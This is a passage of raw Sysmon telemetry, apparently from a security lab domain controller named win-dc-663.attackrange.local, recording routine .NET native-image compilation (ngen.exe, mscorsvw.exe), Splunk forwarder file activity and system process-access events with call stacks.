v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.612{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=352F9E3BC9779E1D8180C8085DB4FAC4,SHA256=9E70F3384C5B46C81769C1738906B3D55B49038B095E83FA7A507294092EA660,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.565{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B6-60D3-6503-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.549{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B6-60D3-6503-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.549{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B6-60D3-6503-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:50.440{4DB9351A-A1B5-60D3-6403-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14ec-0\Microsoft.CSharp.dll2021-06-23 21:03:50.440 23542300x800000000000000020313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.128{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12BAC85BBF1B703618EFAE34DCBE099A,SHA256=2242B7BB55094E273AD46138B48BB61F8D1079EEC1E3BAAC08DE3B9865AAF9ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.956{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=150F7C9BDF06474D4502A219561D7AD6,SHA256=D9C013C8FC6CCB1EDB38568E464182DB790C5D4F73E3C3BC365E537D83BDFBE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.581{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9DF4C9A8EE07D5A7FC53D0E93860A6B,SHA256=27D9F1B215D225D92309E727ED0DA738C1C703CF662216D4B26C181E62E55A1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.581{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.565{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.565{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.440{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6B03-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.424{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6B03-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.424{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6B03-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:51.393{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11d4-0\Microsoft.GroupPolicy.Interop.dll2021-06-23 21:03:51.393 10341000x800000000000000020335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.284{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.268{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.268{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.159{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6903-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.143{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6903-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.143{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6903-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:51.112{4DB9351A-A1B6-60D3-6803-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bb8-0\Microsoft.GroupPolicy.AdmTmplEditor.dll2021-06-23 21:03:51.112 23542300x800000000000000020345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:52.971{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ADD10C15F39128D215FF53CB4E14F75,SHA256=BEFD067C23EE3648D7465B1681847089235FA835A03C7C187DBB96C61AED853A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program 